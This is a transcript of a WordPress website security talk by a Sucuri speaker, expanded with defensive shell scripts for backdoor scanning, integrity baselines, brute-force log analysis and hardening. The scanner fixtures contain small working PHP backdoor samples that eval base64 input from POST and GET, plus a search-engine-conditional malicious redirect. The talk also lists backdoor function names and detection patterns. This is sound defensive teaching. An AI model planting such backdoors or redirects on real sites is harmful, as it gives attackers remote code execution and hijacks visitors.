Website Security - It Begins With Good Posture

  1. It Starts With Good Posture – Website Security (WordPress)
  2. @PEREZBOX
     • Sucuri, Inc. – @sucuri_security – @sucurisupport – @sucurilabs – @perezbox
     • Specialization:
       – Website Security
       – Incident Handling
     • Special Interests:
       – Brazilian Jiu-Jitsu
     6/9/2014 Tony Perez | @perezbox | @sucuri_security
  3. • Website Security Company
     • Global Operations
     • Platform Agnostic (i.e., WordPress, Joomla, etc.)
     • Scan 2M Unique Domains a Month
     • Block 4M Web Attacks a Month
     • Remediate 400–500 Websites a Day
     • Signature / Heuristic Based
     • 24/7 Operations
  4. Statistics
  5. Anatomy of Malicious Websites (chart: Malicious Websites vs. Legitimate Websites)
  6. Legitimate Websites (chart: Not-Exploitable vs. Exploitable) – 1 in 8: Critical Vulnerability
  7. Hacks Affecting Users
  8. Top 4 Symptoms
     • Malicious Redirects (i.e., abuse your traffic)
     • Backdoors (i.e., bypass access controls)
     • Phishing (i.e., spear phishing campaigns)
     • Search Engine Poisoning (i.e., pharma, etc.)
     Obviously many more, but these are the most prevalent.
  9. Malicious Redirect
  10. Malicious Redirects
     • Easy / Medium to Detect
       – Be mindful of conditionals: the redirect often fires only for a given referer (search engines), user agent (mobile, crawlers) or first visit, so a plain curl from your own machine may never see it
     • Looking for Integrity Issues
       – Has something been modified?
     • Common location[s]:
       – .htaccess
       – index.php
       – footer.php
       – header.php
     • Biggest Issue
       – Redirectors are becoming highly complex
       – Employing heavy conditional elements
  11. Phishing
  12. Phishing, cntd.
     • Difficult to Detect Remotely
     • Looking for Integrity Issues
       – Is something somewhere it doesn't belong?
     • Common location[s]:
       – wp-includes
       – Theme directories
     • Biggest Issue
       – It can be anywhere
       – Fully contained (the phishing kit brings its own HTML, images and mailer, so nothing else on the site needs to change)
  13. Backdoors
  14. Backdoors, cntd.
     • Can't detect remotely, only locally
     • Looking for Integrity Issues
       – Is something somewhere it doesn't belong?
     • Common location[s]:
       – wp-includes
       – Root directory
     • Biggest Issue
       – Allows attacker to bypass your access controls
       – Provides full control of the environment
     • Common terms:
       – is_bot
       – eval
       – base64_decode
       – fopen
       – fclose
       – readfile
       – edoced_46esab (base64_decode spelled backwards, used with strrev())
       – exec
       – system
       – shell_exec
       – gzuncompress
       – popen
       – FilesMan
     A quick first pass over a docroot:
       grep -RPl --include='*.php' '(system|exec|passthru|shell_exec|base64_decode|eval)\s*\(' /var/www
     The alternation must not end in an empty alternative (that matches every file), the opening parenthesis after the function name must be escaped, and --include takes a plain glob. Expect hits in legitimate code too (WordPress core and plugins call base64_decode); treat the list as files to diff against a known-good copy, not as a verdict.
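The two "integrity" questions on slides 10 and 14 (has something been modified, is something where it doesn't belong) and the conditional-redirect warning come together in the added shell example below. It is written for this page, not Sucuri's own tooling: it builds a constructed mini docroot with two sample backdoors and one referer-conditional .htaccess, greps for the function names listed above, flags .htaccess files that rewrite search-engine visitors off-site, and compares the tree against a SHA-256 baseline. All paths, file names and sample contents are constructed.

```shell
#!/bin/sh
# Added example: backdoor and redirect triage for a WordPress docroot, plus a
# hash baseline for the "has something been modified?" question. The sample
# tree, file names and sample backdoors below are constructed for this page.

# Function names that show up in most PHP backdoors (the list on the slide),
# followed by optional whitespace and an opening parenthesis.
SUSPECT_CALLS='(system|exec|passthru|shell_exec|popen|proc_open|eval|assert|base64_decode|gzuncompress|gzinflate|str_rot13)[[:space:]]*\('
# Strings that only appear in obfuscated code: strrev("base64_decode"),
# the FilesMan web-shell marker, and the is_bot() helper redirectors use.
SUSPECT_STRINGS='edoced_46esab|FilesMan|is_bot'

# scan_backdoors DIR: PHP files containing any suspect pattern, one per line.
# find + grep -l rather than grep -R --include so it also runs on non-GNU grep.
scan_backdoors() {
    { find "$1" -type f -name '*.php' \
        -exec grep -lE -e "$SUSPECT_CALLS" -e "$SUSPECT_STRINGS" {} + 2>/dev/null || true; } | sort
}

# scan_redirects DIR: .htaccess files that key a RewriteCond on the referer or
# user agent AND rewrite to an absolute off-site URL: the conditional redirect.
scan_redirects() {
    { find "$1" -type f -name '.htaccess' \
        -exec grep -liE 'RewriteCond[[:space:]]+%[{]HTTP_(REFERER|USER_AGENT)[}]' {} + 2>/dev/null || true; } \
    | while IFS= read -r f; do
        grep -qiE 'RewriteRule[[:space:]]+[^[:space:]]+[[:space:]]+https?://' "$f" && printf '%s\n' "$f"
      done | sort
}

# hash_file PATH: sha256 via GNU coreutils, shasum on BSD/macOS.
hash_file() {
    if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1"; else shasum -a 256 "$1"; fi
}

# make_baseline DIR OUT: hash every PHP and .htaccess file, paths relative to DIR.
# Take the baseline from a known-good state (fresh install or right after a clean-up).
make_baseline() {
    ( cd "$1" && find . -type f \( -name '*.php' -o -name '.htaccess' \) | sort \
        | while IFS= read -r f; do hash_file "$f"; done ) > "$2"
}

# check_integrity DIR BASELINE: files that are new or whose hash changed since BASELINE.
check_integrity() {
    now=$(mktemp)
    make_baseline "$1" "$now"
    { diff "$2" "$now" || true; } | awk '/^>/ { print $3 }'
    rm -f "$now"
}

# mk_sample_site: throw-away tree with one clean PHP file, a stock .htaccess,
# two backdoor samples and one conditional-redirect .htaccess. Prints the path.
mk_sample_site() {
    site=$(mktemp -d)
    mkdir -p "$site/wp-includes" "$site/wp-content/uploads" "$site/wp-content/themes"
    cat > "$site/index.php" <<'EOF'
<?php
// constructed clean sample: the stock WordPress front controller
define('WP_USE_THEMES', true);
require __DIR__ . '/wp-blog-header.php';
EOF
    cat > "$site/.htaccess" <<'EOF'
# constructed clean sample: stock WordPress permalink rules
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
EOF
    cat > "$site/wp-includes/class-wp-cache.php" <<'EOF'
<?php
// constructed backdoor sample: runs attacker-supplied base64 code from a POST field
if (isset($_POST['c'])) { @eval(base64_decode($_POST['c'])); }
EOF
    cat > "$site/wp-content/uploads/image.php" <<'EOF'
<?php
// constructed backdoor sample: hides base64_decode behind strrev()
$d = strrev('edoced_46esab'); eval($d($_GET['q']));
EOF
    cat > "$site/wp-content/themes/.htaccess" <<'EOF'
# constructed malicious sample: only visitors arriving from a search engine get sent off-site
RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|bing|yahoo)\. [NC]
RewriteRule ^(.*)$ http://example.net/in.php?$1 [R=302,L]
EOF
    printf '%s\n' "$site"
}
```

Run `scan_backdoors /var/www/html` and `scan_redirects /var/www/html` on a live docroot and feed the hits into a diff against a pristine copy of the same WordPress, plugin and theme versions; the baseline functions give you that comparison for your own tree once you have a clean state to hash. The grep pass is a triage aid only: core and plugins legitimately call base64_decode and friends, and a backdoor written with `preg_replace('/.*/e', ...)` or split strings will not match any of these patterns, which is why the hash comparison, not the grep, is the control.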
  15. Example of Complexity
  16. Search Engine Poisoning
  17. Search Engine Poisoning, cntd.
     • Targets Search Engines (i.e., Google, Bing, Yahoo)
     • Looking for Integrity Issues
       – Have your posts / pages been modified?
     • Common location[s]:
       – index.php (root, theme, plugins, etc.)
       – header.php
       – footer.php
       – Embedded in Database (Posts / Pages)
     • Biggest Issue
       – Continues to evolve
       – Highly conditional (served to crawlers, hidden from normal visitors)
       – Not within visible range – often offscreen
  18. Indicators of a Hack
     Search Engines have gotten pretty good at detecting issues – Google blacklists over 10 thousand websites a day.
  19. Anatomy of Attacks
  20. Phase of an Attack
     What kind of website do you have?
     • Use for malware?
     • Part of a zombie network?
     • Data breach?
  21. Automated Attacks
     • Exploiting Access Control
  22. Distribution Mechanism
  23. There's a Tool for that
     • Malware as a Service (MaaS)
       – Yes, pay someone to hack for you
     • Different tools to break in and generate payloads
       – Brute force and vulnerability exploits
     (diagram: Malware / Payloads)
  24. Why?
  25. Happening To Everyone
  26. It's About Posture
  27. Begins with Posture
     (diagram: Posture vs. Risk) "Risk will never be zero, but it can be reduced"
  28. It's About Good Posture
  29. Layered Defenses
     Protection, Auditing, Detection, Sustainment
  30. Defense in Depth
     "…a concept in which multiple layers of security controls (defenses) are placed throughout an information technology (IT) system. Its intent is to provide redundancy in the event a security control fails or a vulnerability is exploited…"
  31. Access – P@ssw0rd
     • Passwords: Complex – Long – Unique
  32. Enforce Strong Credentials
  33. Auditing (Monitor Activity)
  34. Auditing Questions
     • Understand what is going on at all times
       – Who is logging in?
       – Who is trying to log in?
       – What files are changing?
       – Has a post been created?
       – Has a page been created?
       – Are there any integrity issues?
  35. Principle of Least Privilege
     "requires that in a particular abstraction layer of a computing environment, every module (such as a process, a user or a program depending on the subject) must be able to access only the information and resources that are necessary for its legitimate purpose."
  36. Understand Your Roles
  37. Hardening – Kill PHP
     • PHP Execution, disable it in:
       – /wp-includes
       – /wp-content
         ▪ /themes
         ▪ /plugins
         ▪ /uploads
     .htaccess (Apache 2.2 syntax, as on the slide):
       <Files *.php>
       Deny from all
       </Files>
     On Apache 2.4 the equivalent is "Require all denied"; on nginx this needs a location block returning 403 for .php under those paths, since .htaccess is not read. The rule only blocks direct HTTP requests, so PHP pulled in via require/include from index.php keeps working, but test after applying it: some plugins serve PHP files from wp-content directly and will break, and wp-includes has a couple of files that are requested directly (the Hardening WordPress page linked under Notable Resources carries the rewrite rules with the needed exceptions).
  38. Disable Plugin / Theme Editor
     • wp-config.php modification:
       # Disable Plugin / Theme Editor
       define('DISALLOW_FILE_EDIT', true);
     This removes the in-dashboard editor only. An attacker with a backdoor edits files on disk regardless, and plugin/theme uploads through the dashboard still work unless DISALLOW_FILE_MODS is also set.
  39. Brute Force Attacks
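The auditing question "who is trying to log in?" (slide 34) and the brute-force slide meet in the web server's access log. The added shell example below is not from the talk: it writes a constructed combined-format log (one client hammering wp-login.php and xmlrpc.php, one real user who mistyped a password once, ordinary page views), counts login POSTs per client address, and returns the addresses over a threshold. IP addresses, timestamps and the threshold are constructed.

```shell
#!/bin/sh
# Added example: spot login brute forcing in an Apache/nginx combined-format
# access log. Every log line below is constructed for this page.

# mk_sample_log: twelve failed POSTs plus one xmlrpc.php call from one client,
# one failure (200) and one success (302) from a real user, and two GETs.
# Prints the path of the log file.
mk_sample_log() {
    log=$(mktemp)
    i=0
    while [ $i -lt 12 ]; do
        printf '203.0.113.5 - - [09/Jun/2014:10:00:%02d +0000] "POST /wp-login.php HTTP/1.1" 200 3512 "-" "Mozilla/5.0"\n' "$i" >> "$log"
        i=$((i + 1))
    done
    printf '203.0.113.5 - - [09/Jun/2014:10:00:30 +0000] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"\n' >> "$log"
    printf '198.51.100.7 - - [09/Jun/2014:10:01:00 +0000] "POST /wp-login.php HTTP/1.1" 200 3512 "-" "Mozilla/5.0"\n' >> "$log"
    printf '198.51.100.7 - - [09/Jun/2014:10:01:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"\n' >> "$log"
    printf '192.0.2.44 - - [09/Jun/2014:10:02:00 +0000] "GET /wp-login.php HTTP/1.1" 200 3512 "-" "Mozilla/5.0"\n' >> "$log"
    printf '192.0.2.44 - - [09/Jun/2014:10:02:05 +0000] "GET /2014/06/hello/ HTTP/1.1" 200 9001 "-" "Mozilla/5.0"\n' >> "$log"
    printf '%s\n' "$log"
}

# login_posts LOG: "<count> <ip>" of POSTs to wp-login.php or xmlrpc.php,
# busiest client first. In combined format $1 is the client, $6 the quoted
# method and $7 the request path. GETs are just the form being displayed.
login_posts() {
    awk '$6 == "\"POST" && $7 ~ /^\/(wp-login|xmlrpc)\.php/ { n[$1]++ }
         END { for (ip in n) print n[ip], ip }' "$1" | sort -rn
}

# brute_force_ips LOG THRESHOLD: clients with more than THRESHOLD login POSTs.
brute_force_ips() {
    login_posts "$1" | awk -v max="$2" '$1 > max { print $2 }'
}
```

Two caveats when running this on a real log. Behind a CDN or website firewall the first field is the proxy's address and the real client is in X-Forwarded-For, so log that header and count on it instead. And per-IP counting only catches the single-source case; a distributed attack spreads the same username across hundreds of addresses, and the username is in the POST body, which the access log does not record, so "who is trying to log in" ultimately needs application-level auth logging, not just the web server log.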
  40. Backups – It's Your Safety Net
  41. Software Vulnerabilities
     • Stay current with the latest vulnerabilities:
       – Secure – http://wordpress.org/plugins/secure/
  42. Stay Current (Update)
  43. Website Firewalls
     • Stay ahead of Software Vulnerabilities
  44. Ensure Integrity of Connection
     • https://www.getcloak.com/ | @getcloak
  45. Google Webmaster
  46. Simple Steps to Reduce Risk
     The Bare Minimum:
     1. Connect Securely – SFTP / SSH
     2. Authentication Keys / wp-config
     3. Use Trusted Sources
     4. Use a local Antivirus – Mac too
     5. Permissions – D 755 | F 644
     6. Least Privilege Principles
     7. Accountability
     8. Backups – Include Database
     Ideal implementations:
     1. Employ Website Firewall
     2. Don't let WordPress write to itself
     3. Filter Access by IP
     4. Use a dedicated server / VPS
     5. Monitor all Activity (Logging)
     6. Enable SSL for transactions
     7. Keep environment current (patched)
     8. No Soup Kitchen Servers
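The three file-level items from the hardening slides and the checklist above (kill PHP execution in data directories, DISALLOW_FILE_EDIT, directories 755 and files 644) can be applied and re-checked with the added shell example below. It is written for this page and is not Sucuri's or WordPress's own code: it builds a constructed mini docroot left in the usual "chmod 777 until it works" state, then fixes permissions, appends a deny-PHP block to wp-content/uploads/.htaccess in both Apache 2.4 and 2.2 syntax, and inserts the constant into wp-config.php above the "stop editing" marker. The sample docroot, its wp-config.php contents and the extension list in the FilesMatch are constructed; adjust the extensions to whatever your PHP handler is mapped to.

```shell
#!/bin/sh
# Added example: hardening helpers for a WordPress docroot. The directory
# layout, wp-config.php contents and extension list below are constructed.

# fix_permissions DIR: directories 755, files 644 (the slide's D 755 | F 644).
# This only keeps other users out; if PHP runs as the file owner it can still
# write everywhere, so ownership, not mode, is what stops WordPress writing to itself.
fix_permissions() {
    find "$1" -type d -exec chmod 755 {} +
    find "$1" -type f -exec chmod 644 {} +
}

# mode_of PATH: octal permission bits (GNU stat first, BSD stat as fallback).
mode_of() { stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"; }

# deny_php_in DIR: refuse direct HTTP requests for PHP under DIR. The FilesMatch
# covers the extensions Debian's PHP module maps by default (assumption; adjust
# to your handler). Idempotent: skips if the block is already present.
deny_php_in() {
    ht="$1/.htaccess"
    grep -qs 'BEGIN deny-php' "$ht" && return 0
    cat >> "$ht" <<'EOF'
# BEGIN deny-php
<FilesMatch "\.ph(ar|p[0-9]?|tml)$">
    <IfModule mod_authz_core.c>
        Require all denied
    </IfModule>
    <IfModule !mod_authz_core.c>
        Order Allow,Deny
        Deny from all
    </IfModule>
</FilesMatch>
# END deny-php
EOF
}

# set_disallow_file_edit WPCONFIG: add the constant just above the
# "That's all, stop editing!" marker, or at the end if the marker is missing.
# Rewrites through cat so wp-config.php keeps its owner and mode.
set_disallow_file_edit() {
    grep -q 'DISALLOW_FILE_EDIT' "$1" && return 0
    tmp=$(mktemp)
    awk -v line="define('DISALLOW_FILE_EDIT', true);" '
        /stop editing/ && !done { print line; done = 1 }
        { print }
        END { if (!done) print line }' "$1" > "$tmp"
    cat "$tmp" > "$1" && rm -f "$tmp"
}

# harden DIR: apply all three to a docroot.
harden() {
    fix_permissions "$1"
    deny_php_in "$1/wp-content/uploads"
    set_disallow_file_edit "$1/wp-config.php"
}

# mk_sample_docroot: constructed mini docroot with world-writable wp-content
# and a PHP file that ended up in uploads. Prints the path.
mk_sample_docroot() {
    root=$(mktemp -d)
    mkdir -p "$root/wp-content/uploads/2014/06" "$root/wp-includes"
    printf 'not really a jpeg\n' > "$root/wp-content/uploads/2014/06/photo.jpg"
    printf '<?php // constructed sample: a PHP file dropped into uploads\n' > "$root/wp-content/uploads/2014/06/shell.php"
    printf '<?php\n%s\n%s\n' \
        "define('DB_PASSWORD', 'constructed-sample');" \
        "/* That's all, stop editing! Happy blogging. */" > "$root/wp-config.php"
    chmod -R 777 "$root/wp-content"
    printf '%s\n' "$root"
}
```

Running `harden /var/www/html` twice is safe; the second pass changes nothing. Because the shell.php in the sample is still on disk after hardening (only its execution over HTTP is refused), pair this with the backdoor scan: the deny rule buys time, the file still has to go. Where ownership allows it, wp-config.php can be tightened further to 640 since it carries the database credentials and authentication keys.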
  47. Notable Resources
     • Sucuri Blog – http://blog.sucuri.net
     • Sucuri TV – http://sucuri.tv
     • Malware Scanner – http://sitecheck.sucuri.net
     • Malware Scanner – http://unmaskparasites.com
     • Badware Busters – https://badwarebusters.org
     • Google Forums – http://productforums.google.com/forum/#!categories/webmasters/malware--hacked-sites
     • Google Webmaster Tools – http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633
     • Secunia Security Advisories – http://secunia.com/community/advisories/search/?search=wordpress
     • Exploit-DB – http://www.exploit-db.com/search/?action=search&filter_description=Wordpress&filter_platform=31
     • WordPress Hacked FAQ – http://codex.wordpress.org/FAQ_My_site_was_hacked
     • WordPress Hardening – http://codex.wordpress.org/Hardening_WordPress
  48. Dealing with a Hack
     • Dealing with Malware – http://blog.sucuri.net/2012/10/dealing-with-todays-wordpress-malware.html
     • Leveraging Google Webmaster Tools – http://www.unmaskparasites.com/malware-warning-guide/
     • Google Webmaster Tools (Hacked) – http://www.google.com/webmasters/hacked/
     • Understanding Google's Blacklists – http://blog.sucuri.net/2013/11/understanding-googles-blacklist-cleaning-your-hacked-website-and-removing-from-blacklist.html
     • Cleaning Your Website with Free Scanner – http://blog.sucuri.net/2013/10/cleaning-up-your-wordpress-site-with-the-free-sucuri-plugin.html
     • WordPress Tips & Tricks – http://blog.sucuri.net/2012/07/website-malware-removal-wordpress-tips-tricks.html
  49. Sucuri, Inc. – Tony Perez
     http://sucuri.net
     http://blog.sucuri.net
     @perezbox | @sucuri_security
     @sucurilabs | @sucurisupport